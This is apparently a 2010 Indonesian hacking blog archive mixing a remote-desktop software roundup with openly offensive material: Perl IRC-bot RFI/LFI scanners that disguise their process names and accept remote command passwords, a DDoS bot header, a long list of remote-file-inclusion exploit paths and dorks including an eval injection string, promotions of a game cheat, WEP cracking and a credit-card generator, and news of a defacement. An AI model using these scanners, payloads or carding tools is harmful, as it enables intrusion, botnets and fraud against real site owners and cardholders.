- Article (17)
- bug dork lfi (5)
- bug dork list (5)
- bug dork rfi (5)
- bug dork sql (5)
- bug dork timthumb (5)
- bug dork xml (5)
- Dork RFI (8)
- Exploit (5)
- Hacking Tools (52)
- Kill-9 News (14)
- lfi bug dork (5)
- Lfi Dork (3)
- LFI Scanner (5)
- Linux-Kernel (17)
- list bug (5)
- list bug dork (5)
- rfi bug dork (5)
- Rfi Scanner (17)
- SQLi (15)
- tutorial (36)
Statistic User
Tuesday, 26 January 2010
Remote Desktop Gratis Terbaik
Berikut adalah beberapa layanan Remote Desktop Gratis yang tersedia di Internet. Masing-masing memiliki karakteristik serta fitur yang berbeda. Beberapa di antaranya merupakan layanan berbasis web di mana kita harus terlebih dahulu mendaftar dan melakukan instalasi satu program kecil, ada pula yang bersifat stand alone sehingga mengakses komputer dapat dilakukan lewat jalur VPN. Selain itu ada pula yang berkemampuan untuk berbagi layar desktop bagi lengkap dengan fasilitas chat dan VOIP yang biasanya berguna untuk melakukan pelatihan atau presentasi jarak jauh dan bahkan ada pula yang memungkinkan kita untuk melakukan remote desktop melalui handphone atau PDA.
Menggunakan Yuuguu untuk berbagi layar desktop via Web, anda dapat meminta peserta untuk berbagi kontrol layar dan bekerja sama secara real time melalui web. Sangat membantu untuk bekerja sama menyuntung sebuah dokumen, mempercepat proses pembuatan dokumen dan presentasi secara online.
Cukup instal LogMeIn pada komputer yang ingin diakses dan kita akan dapat melakukan remote terhadap PC atau Mac dari mana saja hanya menggunakan sebuah browser. Apapun dapat dilakukan seolah-olah secara fisik berada di depan PC atau Mac yang sedang di remote.
CrossLoop memungkinkan kita untuk melihat layar, kendali atas mouse dan keyboard pada komputer remote. Dalam promosinya CrossLoop dapat dijalankan dalam waktu kurang dari 2 menit. Cukup download dan instal aplikasi dan akan secara otomatis mengkonfigurasi sendiri untuk lingkungan jaringan komputer anda.
ShowMyPC memungkinkan kita untuk berkolaborasi dalam melakukan Remote Desktop. Cocok sebagai alternatif untuk yang Anda yang sudah biasa menggunakan WebEx atau Gotomypc. Beberapa kelebihannya antara lain gratis, tidak perlu instalasi, pendaftaran, tidak perlu login. Juga memiliki fitur chatting, White-Board dan mampu merekam layar. Dibangun menggunakan standar SSH VNC serta menyediakan layanan Premium Hosting.
Menggunakan SkyFex Remote Assitant memungkinkan kita menyaksikan dan mengakses komputer dari jauh secara real time. Skyfex tidak memerlukan tambahan software dan bekerja melalui proxy, firewall atau NAT pada jaringan. SkyFex adalah layanan berbasis Windows dan membutuhkan Internet Explorer.
Selain dapat melakukan remote desktop, TeamViewer dilengkapi dengan fitur transfer file yang memungkinkan kita menyalin file dan folder dari dan ke komputer yang sedang diakses.
Untuk memasang TeamViewer tidak diperlukan hak Administrator. Cukup jalankan software dan jangan lupa untuk mematikannya setelah selesai. Jika menggunakan TeamViewer tidak perlu khawatir tentang firewall karena TeamViewer akan menemukan cara komunikasi secara otomatis. Untuk penggunaan non-komersial tersedia secara gratis.
Pertama kita harus mengunduh dan menginstal Gooer pada semua komputer yang ingin diakses. Setelah itu komputer dapat diakses menggunakan PC atau perangkat Mobile. Pengguna PC bisa menggunakan sebuah browser (IE, Firefox atau web browser lain yang mendukung Java) sedangkan pengguna mobile dapat mengunjungi untuk mendapatkan aplikasi berbasis Java yang tersedia untuk klien perangkat Mobiles/PDA.
Jika ingin mengakses remote komputer melalui ponsel atau PDA, Anda harus memasang di atas Gooer Host Software PC ke host pertama, setelah itu Anda dapat men-download software ini, Anda kirimkan ke perangkat mobile dan menginstalnya.
8.Microsoft SharedView
Untuk memulai sesi program ini Anda harus terlebih dahulu sign in menggunakan Windows Live ID. Jika Anda ingin memulai sesi dan tidak memiliki Windows Live ID, Anda dapat menginstalas program ini namun sebelum masuk, Anda tetap memiliki Windows Live ID.
Yakkle dibangun menggunakan platform Java. Fungsi remote desktop sharing sebenarnya hanya salah satu fitur yang tersedia selain Instant Messaging, File Sharing, Video dan Conference. Yakkle dapat saling berkomunikasi dengan Gmail serta Jabber. Yakkle juga mampu berintegrasi dengan account Twitter.
Dimdim Web Meeting tersedia dalam edisi open source maupun komersiil yang mampu mendukung ribuan peserta. Tidak seperti layanan web meeting sebelumnya, Dimdim tersedia secara online atau kita juga dapat menginstalnya di server pribadi.
Untuk menggunakan DESKTRA, unduh dulu file "FreedomSetup1_1.exe", instal pada PC yang ingin diakses dari internet. PC ini disebut "HOST". Windows perlu reboot untuk menyelesaikan instalasi. Setelah reboot gunakan akun yang sama saat meng-install DESKTRA untuk melanjutkan proses instalasi.
PC tersebut akan dipromosikan dengan DESKTRA Freedom Desktop Server Control Panel. ID baru otomatis dibuat ketika "DESKTRA Freedom Server.exe" berjalan untuk pertama kalinya. Isi password yang Anda inginkan dan klik tombol "Start" untuk memulainya.
Beberapa keunggulan yang dimilikinya:
* Zero-Configuration: instal dan Anda siap digunakan! Tidak perlu konfigurasi yang rumit mengubah setting jaringan, ataupun firewall untuk memulainya.
* Mudah pakai: akses komputer dari manapun selama dalam dalam daftar Anda dunia!
* Aman: semua data dienkripsi dan private agar tidak ada orang lain dapat melihatnya. Tentu saja NO spyware atau adware apapun!
* Cepat: Remobo akan mencoba untuk membuat koneksi secara langsung atau peer-to-peer antara komputer untuk mendapatkan kecepatan terbaik.
* Fleksibel: dilengkapi dengan akses remote desktop, file sharing & VPN.
Wednesday, 13 January 2010
PittbuLL Scanner
# Release Name : XxX-SuperScan-XxX
# Author : arianom killnine
# ------------- [% Notes %] -------------
# This rfi scanner contains piece of code from; kiLL-9 CreW, arianom, kiLLer.
# And also lets just say more version wil come :P
# With this release you must be happy since its the best RFi Scanner around.
# And its even public, happy x-mas ! :D
# You can also PM the bot with your scan, this is handy when you have loaded multiple scanners.
# ------------- [% Basic Commands %] -------------
# !rfi Bug Dork ( Ex. !rfi index.php?page= "index.php?page=" ) Normal RFi Scan
# !lfi Bug Dork ( Ex. !lfi index.php?page= "index.php?page=" ) Normal LFi Scan
# ------------- [% Special Commands %] -------------
# !autorfiscan Bug Dork ( Ex. !autorfiscan index.php?page= "index.php?page=" ) Auto site: Scan
# !autorfipath Bug Dork ( Ex. !autorfipath page= ) Autopath scan like index.php,home.php,contact.php etc.
# !afsluiten ( Ex. !afsluiten ) make bot leave
# !info ( Ex. !info ) shows info
# ------------- [% Version %] -------------
# 1.0 Stable Public Release
# ------------- [% ASC %] -------------
# Mafia_KB, i hope i pretty fucked up your sell
# asking 2000 fucking euros for a crappy scan ?
# this one is 1000 times better so i hope
# it affects your sell even more lol.
use HTTP::Request;
use LWP::UserAgent;
use IO::Socket::INET;
my $response = ""; # included in zip as response.txt
my $test = ""; # included in zip as test.txt
my $printcmd = "";
my $responselfi = "/../../../../../../../../etc/passwd";
my $printcmdlfi = "/../../../../../../../../etc/passwd";
my $spread = "";
my $nickname = "kiLLeR|".(int(rand(999)));
my $ident = "kiLL";
my $channel = "#kill-9";
my $server = "";
my $port = 6667;
Download [full + id]
# Release Name : XxX-SuperScan-XxX
# Author : arianom killnine
# ------------- [% Notes %] -------------
# This rfi scanner contains piece of code from; kiLL-9 CreW, arianom, kiLLer.
# And also lets just say more version wil come :P
# With this release you must be happy since its the best RFi Scanner around.
# And its even public, happy x-mas ! :D
# You can also PM the bot with your scan, this is handy when you have loaded multiple scanners.
# ------------- [% Basic Commands %] -------------
# !rfi Bug Dork ( Ex.
# !lfi Bug Dork ( Ex.
# ------------- [% Special Commands %] -------------
# !autorfiscan Bug Dork ( Ex.
# !autorfipath Bug Dork ( Ex.
# !afsluiten ( Ex.
# !info ( Ex.
# ------------- [% Version %] -------------
# 1.0 Stable Public Release
# ------------- [% ASC %] -------------
# Mafia_KB, i hope i pretty fucked up your sell
# asking 2000 fucking euros for a crappy scan ?
# this one is 1000 times better so i hope
# it affects your sell even more lol.
use HTTP::Request;
use LWP::UserAgent;
use IO::Socket::INET;
my $response = ""; # included in zip as response.txt
my $test = ""; # included in zip as test.txt
my $printcmd = "";
my $responselfi = "/../../../../../../../../etc/passwd";
my $printcmdlfi = "/../../../../../../../../etc/passwd";
my $spread = "";
my $nickname = "kiLLeR|".(int(rand(999)));
my $ident = "kiLL";
my $channel = "#kill-9";
my $server = "";
my $port = 6667;
Download [full + id]
Sunday, 10 January 2010
V6 Osirys
use IO::Socket::INET;
use HTTP::Request;
use LWP::UserAgent;
$auth = "Osirys";
$authmail = "osirys\";
my $id = ""; #Your RFI Response
my $shell = ""; #Shell printed on the Vulnerable Site
my $ircd = ""; #Irc-Server
my $port = "6667"; #Irc-Server Port
my $chan1 = "#malang"; #Chan for Scan
my $chan2 = "#kill-9"; #Results will be printed here too
my $nick = "v6"; #Nick
my @admins = ("arianom");
my $sqlpidpr0c = 1; # This is the number of sites that the bot will test in the same time. For an accurated scann, it's reccomended to set a low number(1)
# (Expecially if you are scanning on 0day bugs), so a lot of presunted vulnerable sites. Unless you will see the bot exiting by an excess flood!
# Instead, if you are scaning on old bugs, so not many results, you can put a higher number, so more speed.
my $rfipidpr0c = 50;
### USEFULL OPTIONS ( 0 => OFF ; 1 => ON )
my $spread = "";
my $spreadACT = 0; #0 ->disabled, 1 ->enabled
my $securityACT = 0; #0 ->disabled, 1 ->enabled
my $killpwd = "lol"; #Password to Kill the Bot
my $chidpwd = "lol"; #Password to change the RFI Response
my $cmdpwd = "lol"; #Password to execute commands on the server
my $secpwd = "lol"; #Passowrd to enable/disable the Security Mode
my $spreadpwd = "lol"; #Passowrd to enable/disable the Spread Mode
my $badspreadpwd != $spreadpwd;
my $badkillpwd != $killpwd;
my $badidpwd != $chidpwd;
my $badcmdpwd != $cmdpwd;
my $badsecpwd != $secpwd;
$k= 0;
print q{
__ ___
__ __/ / / __| __ __ _ _ _ _ _ ___ _ _
\ V / _ \ \__ \/ _/ _` | ' \| ' \/ -_) '_|
\_/\___/ |___/\__\__,_|_||_|_||_\___|_|
[+] Coded by Osirys
[+] Contact: osirys[at]live[it]
[+] Keep it private !
[+] *New release, more fun ;)
[+] *Updated to: 18/06/2008
Download [lengkap + Id]
use IO::Socket::INET;
use HTTP::Request;
use LWP::UserAgent;
$auth = "Osirys";
$authmail = "osirys\";
my $id = ""; #Your RFI Response
my $shell = ""; #Shell printed on the Vulnerable Site
my $ircd = ""; #Irc-Server
my $port = "6667"; #Irc-Server Port
my $chan1 = "#malang"; #Chan for Scan
my $chan2 = "#kill-9"; #Results will be printed here too
my $nick = "v6"; #Nick
my @admins = ("arianom");
my $sqlpidpr0c = 1; # This is the number of sites that the bot will test in the same time. For an accurated scann, it's reccomended to set a low number(1)
# (Expecially if you are scanning on 0day bugs), so a lot of presunted vulnerable sites. Unless you will see the bot exiting by an excess flood!
# Instead, if you are scaning on old bugs, so not many results, you can put a higher number, so more speed.
my $rfipidpr0c = 50;
### USEFULL OPTIONS ( 0 => OFF ; 1 => ON )
my $spread = "";
my $spreadACT = 0; #0 ->disabled, 1 ->enabled
my $securityACT = 0; #0 ->disabled, 1 ->enabled
my $killpwd = "lol"; #Password to Kill the Bot
my $chidpwd = "lol"; #Password to change the RFI Response
my $cmdpwd = "lol"; #Password to execute commands on the server
my $secpwd = "lol"; #Passowrd to enable/disable the Security Mode
my $spreadpwd = "lol"; #Passowrd to enable/disable the Spread Mode
my $badspreadpwd != $spreadpwd;
my $badkillpwd != $killpwd;
my $badidpwd != $chidpwd;
my $badcmdpwd != $cmdpwd;
my $badsecpwd != $secpwd;
$k= 0;
print q{
__ ___
__ __/ / / __| __ __ _ _ _ _ _ ___ _ _
\ V / _ \ \__ \/ _/ _` | ' \| ' \/ -_) '_|
\_/\___/ |___/\__\__,_|_||_|_||_\___|_|
[+] Coded by Osirys
[+] Contact: osirys[at]live[it]
[+] Keep it private !
[+] *New release, more fun ;)
[+] *Updated to: 18/06/2008
Download [lengkap + Id]
Saturday, 9 January 2010
Windows Admin Password Hack 2010
Windows Admin Password Hack:
Forgot your NT admin password?
Reinstall? Oh no… But not any more…
This is a utility to (re)set the password of any user that has a valid (local) account on your NT system.
You do not need to know the old password to set a new one.
It works offline, that is, you have to shutdown your computer and boot off a floppydisk or CD. The bootdisk includes stuff to access NTFS and FAT/FAT32 partitions and scripts to glue the whole thing together.
Will detect and offer to unlock locked or disabled out user accounts!
It is also an almost fully functional registry editor!
Windows Admin Hack allows you to reset the administrator password on
Windows 2000/XP.
The ISO must be burned to a CD or Flash drive.
When it is booted, a mini version of linux starts which allows the
administrator password to be reset. useful if you need to work on a
machine the password is unknown.
1. Rapidshare
2. Password:
Garena Hack 5.7c
Released a new Garena Hack 5.7c.
Garena Hack 5.7c:
- Protection not see running hacks
- Hack is running version 1.23 & 1.24
- No message at the beginning where it is written that your ACC banned ..
- Gold 100 Exp 15 min Basic 50 exp even when you do not play
- No need to wait 5 seconds that would go into the room
- Flooding can be non-stop
Instructions for use:
1) Run the downloaded file in garena.exe folder and log in using your login Garen
2) In the folder with the downloaded Garena Haq Find the file Launch.bat through it we will run!
3) After clicking on Launch.bat blue window will appear where you must select the option for which version Var3 its run or even separately!
4) In this blue box, click 1 and enter, then we test fails, skip it and press any key)
5) Everything is ready:
Go through Launch.bat only the folder.
1. Uploading
2. Mirror
Hacking Wep Tutorials
I find out how hack wep , and now i write it in notepad and post it for you .
I download all tools for you , so you will have all what you need.
Some antivirus "aircrack-ng-1.0-win" see like virus , but its cracking tool.
I hope i help you guys .
It have only 12 steps and 2 tools what you need , for tutorials you will see "Wep Hack tutorials"
you can't miss it . Good luck and have fun
Download : (size :4408 KB)
1. Rapidshare
2. Password:
Friday, 8 January 2010
Bjork Scanner
# Im not living im just killing time
# radiohead ganja bjork the beatles
use IO::Socket::INET;
use HTTP::Request;
use LWP::UserAgent;
# Im not living im just killing time
# radiohead ganja bjork the beatles
my @ps = ("/usr/sbin/ateam","/usr/local/apache/bin/httpd -DSSL","/sbin/syslogd","[eth0]","/sbin/klogd -c 1 -x -x","/usr/sbin/acpid","/usr/sbin/cron","[httpds]","/usr/sbin/httpd","[bash]");
$processo = $ps[rand scalar @ps];
my $linas_max='2';
my $sleep='3';
my $cmd="";
my $id="";
my $spread="";
my $spreads="";
my @adms=("arianom","kamtiez","!");
my @canais="#kill-9";
# Im not living im just killing time
# radiohead ganja bjork the beatles
my @nickname = ("killer");
my @rname = ("cailio");
my $nick = $nickname[rand scalar @nickname];
my $ircname = $nickname[rand scalar @nickname];
my $realname = $rname[rand scalar @rname];
$servidor='' unless $servidor;
my $porta='7000';
Download Full Scanner
# Im not living im just killing time
# radiohead ganja bjork the beatles
use IO::Socket::INET;
use HTTP::Request;
use LWP::UserAgent;
# Im not living im just killing time
# radiohead ganja bjork the beatles
my @ps = ("/usr/sbin/ateam","/usr/local/apache/bin/httpd -DSSL","/sbin/syslogd","[eth0]","/sbin/klogd -c 1 -x -x","/usr/sbin/acpid","/usr/sbin/cron","[httpds]","/usr/sbin/httpd","[bash]");
$processo = $ps[rand scalar @ps];
my $linas_max='2';
my $sleep='3';
my $cmd="";
my $id="";
my $spread="";
my $spreads="";
my @adms=("arianom","kamtiez","!");
my @canais="#kill-9";
# Im not living im just killing time
# radiohead ganja bjork the beatles
my @nickname = ("killer");
my @rname = ("cailio");
my $nick = $nickname[rand scalar @nickname];
my $ircname = $nickname[rand scalar @nickname];
my $realname = $rname[rand scalar @rname];
$servidor='' unless $servidor;
my $porta='7000';
Download Full Scanner
Thursday, 7 January 2010
Hack Credit Cards
Generate valid Credit card numbers with their cvv numbers. Hack with their Valid Complete details and have some great fun.
Bugs Tested
.scan /components/com_joomlalib/standalone/stubjambo.php?baseDir= “/index.php?option=com_easybook”
.scan /assets/snippets/reflect/snippet.reflect.php?reflect_base= “/index.php?id=50?
.scan /lib/adodb_lite/{}eval($_GET[w]);class%20zZz_ADOConnection{}//&w=include($_GET[a]);&a= “Diese Seite wurde mit der quelloffenen Software CMS Made Simple erstellt.”
.scan /members/?INC= “YourWebsitename gives you the best search results and keyword bidding.”
.scan /members/?INC= “If You lost password enter Your login:”
.scan2 ////////?cmd&file= “index.php?cmd=10?
.scan2 /include/ /list.php?bbs_id=
.scan2 /components/com_joomlalib/standalone/stubjambo.php?baseDir= “option,com_joomlalib”
.scan2 /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath= “/plugins/mygallery/”
.scan2 /skins/advanced/advanced1.php?pluginpath[0]= “/advanced2.php”
.scan2 /admin/auth.php?xcart_dir= “/pages.php?pageid=3? -p 200
.scan2 /admin/auth.php?xcart_dir= “/admin/auth.php?xcart_dir=”
.scan2 /?sourcedir= “/QueryString.php”
.scan2 /skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path= “/board.php?board=”
.scan2 ?sourcedir= index.php?sourcedir=
.scan2 /components/com_joomlalib/standalone/stubjambo.php?baseDir= /index.php?option=com_gallery2
.scan2 /bemarket/postscript/postscript.php?p_mode= /bemarket/
.scan2 /lib/adodb_lite/{}eval($_GET[w]);class%20zZz_ADOConnection{}//&w=include($_GET[a]);&a= /index.php?mact= -p 200
.scan2 /lib/adodb_lite/{}eval($_GET[w]);class%20zZz_ADOConnection{}//&w=include($_GET[a]);&a= News,cntnt01,detail,0&cntnt01articleid= -p100
.scan2 /stats.php?dir[func]=&dir[base]= “mygamingladder” “my gaming ladder”
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.scan2 /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path= “com_sitemap”
.scan2 /autoclose.php?subd= “Help Desk Software By Kayako eSupport v3.10.02?
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.scan2 /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act= “/kboard.php?board=notice”
.scan2 /inc/ “Translated by Slaver”
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.scan2 /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path= “/index.php?option=com_content” xoo
.scan2 /admin.php?include_path= “Powered by Lazarus Guestbook from”
.scan2 /classes/Import_MM.class.php?g_rb_basedir= “PHPRecipeBook”
.scan2 /?sIncPath= “Copyright © 2008 Your Company.”
.scan2 /?sIncPath= “/index.php?members_mode=”
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.scan2 /update/update2.php?lang= photokorn 1.53
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.scan2 /index.php?view=page&pagename= “/?view=selectcity&targetview=post&cityid=-3〈=en”
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.scan2 /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir= “/index.php?module=Pagesetter”
.scan2 /index.php?view=page&pagename= “/?view=main&cityid=”
.scan2 /index.php?view=page&pagename= “You have an error in your SQL syntax;”
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.scan2 /page.php?id= “/index.php?id=cats”
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.scan2 /assets/snippets/reflect/snippet.reflect.php?reflect_base= “MODx” “MODx”
.scan2 /assets/snippets/reflect/snippet.reflect.php?reflect_base= “MODx Parse Error”
.scan2 /assets/snippets/reflect/snippet.reflect.php?reflect_base= “/index.php?id=5?
.scan2 /assets/snippets/reflect/snippet.reflect.php?reflect_base= “/index.php?id=1&start=10?
.scan2 /tools/send_reminders.php?noSet=0&includedir= “WebCalendar v1.1.0c-CVS”
.scan2 /assets/snippets/reflect/snippet.reflect.php?reflect_base= “snippets/reflect”
.scan2 /assets/snippets/reflect/snippet.reflect.php?reflect_base= “MODx CMS”
.scan2 /assets/snippets/reflect/snippet.reflect.php?reflect_base= “My MODx Site is powered by MODx Content Management System”
.scan2 /index.php?view=page&pagename= “Buy, sell, trade, date, events… post anything”
.scan2 /index.php?view=page&pagename= “Thank you for stopping by my site. Here you can leave your mark.”
.scan2 /includes/function_core.php?web_root= “Mp3 Rating”
.scan2 /?mosConfig_absolute_path= “Powered by Joomla!”
.scan2 /modules/Forums/admin/admin_words.php?phpbb_root_path= “Hebrew Ver. HebNukeR 2.0 © 2004 by All Rights Reserved”
.scan2 /index.php?option=com_custompages&cpage= Joomla custompages
.scan2 /booth.php?include_path= “/poll_cookie.php”
.scan2 /update/update2.php?lang= “photo foto gallery bilder tauchen wracks galerie”
.scan2 /header.php?base_folder= “Powered by Bab.stats”
.scan2 /tools/send_reminders.php?noSet=0&includedir= WebCalendar v1.0RC3 (11 Mar 2005)
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Sunday, 3 January 2010
Cracker Indonesia Kembali Lumpuhkan Situs Malaysia
JAKARTA - Cracker Indonesia kembali beraksi di situs milik Malaysia. Kali ini yang menjadi korban serangan adalah situs Malaysia Natural Heritage.
Pantauan Okezone, Minggu (3/1/2010) di situs yang beralamat di tersebut menunjukkan tampilan situs tersebut telah diubah. Sebuah tulisan besar tampak jelas dalam gambar bendera Malaysia. Tulisan tersebut mengklaim bahwa situs tersebut milik Rakyat Indonesia.
"Situs ini diklaim oleh Rakyat Indonesia," demikian tulisan tersebut.
Selain itu, cracker yang menggunakan nama Arianom tersebut juga menuliskan sejumlah pesan-pesan yang menyudutkan Malaysia. seperti "Negara tak berbudaya, Suka Mencuri Kebudayaan Indonesia," tulisnya.
Aksi saling serang antara Indonesia dan Malaysia di dunia maya seolah tidak ada hentinya. Sebelumnya, pada September 2009 cracker Indonesia juga menyerang situs Malaysia.
Setidaknya sekira 50 situs Malaysia berhasil dikerjai cracker Indonesia, ketika itu. Selain mengibarkan bendera merah putih secara virtual, mereka juga menyematkan sebuah shoutbox yang memungkinkan para pengunjung situs-situs yang di-hack memberikan komentar. (ugo)
Pantauan Okezone, Minggu (3/1/2010) di situs yang beralamat di tersebut menunjukkan tampilan situs tersebut telah diubah. Sebuah tulisan besar tampak jelas dalam gambar bendera Malaysia. Tulisan tersebut mengklaim bahwa situs tersebut milik Rakyat Indonesia.
"Situs ini diklaim oleh Rakyat Indonesia," demikian tulisan tersebut.
Selain itu, cracker yang menggunakan nama Arianom tersebut juga menuliskan sejumlah pesan-pesan yang menyudutkan Malaysia. seperti "Negara tak berbudaya, Suka Mencuri Kebudayaan Indonesia," tulisnya.
Aksi saling serang antara Indonesia dan Malaysia di dunia maya seolah tidak ada hentinya. Sebelumnya, pada September 2009 cracker Indonesia juga menyerang situs Malaysia.
Setidaknya sekira 50 situs Malaysia berhasil dikerjai cracker Indonesia, ketika itu. Selain mengibarkan bendera merah putih secara virtual, mereka juga menyematkan sebuah shoutbox yang memungkinkan para pengunjung situs-situs yang di-hack memberikan komentar. (ugo)
Friday, 1 January 2010
Source Code DDOS
use IO::Socket;
use IO::Select;
use Socket;
my $processo = '/usr/sbin/httpd';
my $linas_max='8';
my $sleep='0';
my $id="";
my @adms=("tukulesto","kaMtiEz");
#my @hostauth=("1980");
my @canais=("#indonesiancoder");
my $nick = "DDoSer";
my $ircname ='GodFather';
chop (my $realname = 'GF');
$servidor='' unless $servidor;
my $porta='7000';
# Eof Configuration #
$SIG{'PS'} = 'IGNORE';
use IO::Socket;
use Socket;
use IO::Select;
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use IO::Socket;
use IO::Select;
use Socket;
my $processo = '/usr/sbin/httpd';
my $linas_max='8';
my $sleep='0';
my $id="";
my @adms=("tukulesto","kaMtiEz");
#my @hostauth=("1980");
my @canais=("#indonesiancoder");
my $nick = "DDoSer";
my $ircname ='GodFather';
chop (my $realname = 'GF');
$servidor='' unless $servidor;
my $porta='7000';
# Eof Configuration #
$SIG{'PS'} = 'IGNORE';
use IO::Socket;
use Socket;
use IO::Select;
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